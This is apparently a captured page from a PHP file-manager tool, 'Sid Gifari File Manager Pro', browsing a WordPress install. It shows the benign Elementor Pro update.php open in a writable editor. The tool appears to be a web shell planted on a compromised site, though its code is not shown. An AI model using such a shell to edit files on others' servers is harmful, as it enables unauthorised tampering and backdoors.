🔐 Sid Gifari File Manager Pro
v8.0.5 | 2026-06-18 08:06:53 | PHP 8.1.34
📂
/ (Root)
/
home
/
therahul
/
public_html
/
wp-content
/
plugins
/
elementor-pro
/
modules
/
wp-cli
📍 /home/therahul/public_html/wp-content/plugins/elementor-pro/modules/wp-cli
🔄 Refresh
✏️
Editing: update.php
Writable
<?php namespace ElementorPro\Modules\WpCli; use Elementor\Modules\WpCli\Update as UpdateBase; if ( ! defined( 'ABSPATH' ) ) { exit; // Exit if accessed directly } /** * Elementor Page Builder Pro cli tools. */ class Update extends UpdateBase { protected function get_update_db_manager_class() { return '\ElementorPro\Core\Upgrade\Manager'; } }
💾 Save Changes
❌ Cancel